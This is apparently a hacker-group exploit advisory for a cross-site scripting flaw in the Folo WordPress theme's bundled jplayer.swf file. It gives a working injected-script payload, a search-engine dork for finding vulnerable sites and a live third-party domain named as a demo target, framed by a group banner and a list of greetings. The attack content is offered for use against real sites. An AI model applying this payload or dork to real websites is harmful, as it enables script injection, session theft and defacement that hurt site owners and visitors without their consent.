#####################################
Title:Wordpress Folo Theme xss Vulnerability
#####################
##############################################################
__ __ _____ _ ______ ______ _______ _____
| \/ | /\ | __ \| | | ____| ____|__ __/ ____|
| \ / | / \ | | | | | | |__ | |__ | | | (___
| |\/| | / /\ \ | | | | | | __| | __| | | \___ \
| | | |/ ____ \| |__| | |____| |____| |____ | | ____) |
|_| |_/_/ \_\_____/|______|______|______| |_| |_____/
##############################################################
#Author:Darksnipper
#Email:Darksnipper@live.com
#####################################
#Home:- www.MadLeeTs.com
#####################################
#####################################
#Home:- www.CyberCoderss.Blogspot.com
#####################################
Vendor Link:http://themify.me/themes/folo
Dork:-inurl:"inurl:/wp-content/themes/folo/"
Tested On:- Windows 7,Linux,Windows xp
######################################################################
#P.o.c
http: //127.0.0.1/wp-content/themes/folo/assets/js/jplayer.swf
payload
?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/MaDLeets/)//
Demo:-
krushlicious.com/wp-content/themes/folo/assets/js/jplayer.swf
payload:-
?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/MaDLeets/)//
Like:-
http://127.0.01/wp-content/themes/folo/assets/js/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/MaDLeets/)//
########################################################################
Greetz:1337,Dream.killer,Soul~inj3ct0r,Force-Ex,x3o-1337,Shadow008,H4x0r
Hussy,H4x0rl1f3,Invectus,Sahrawi
Hacker,Madc0de Haxor,Makman,Sniffer,Retno Pro, Tr4ck3r,b0x,Gujjar
Pcp,P4k Command3r,Pain006,Anon DeXter,
Ap3x Pr3d1at0r,Ment@l Mind,Evan Ricafort,Syndicate,Root Haxor,Kd
Divakar,r00X,,zHC Snipper,All Madleets Members,Kashmiri HackerS.
########################################################################
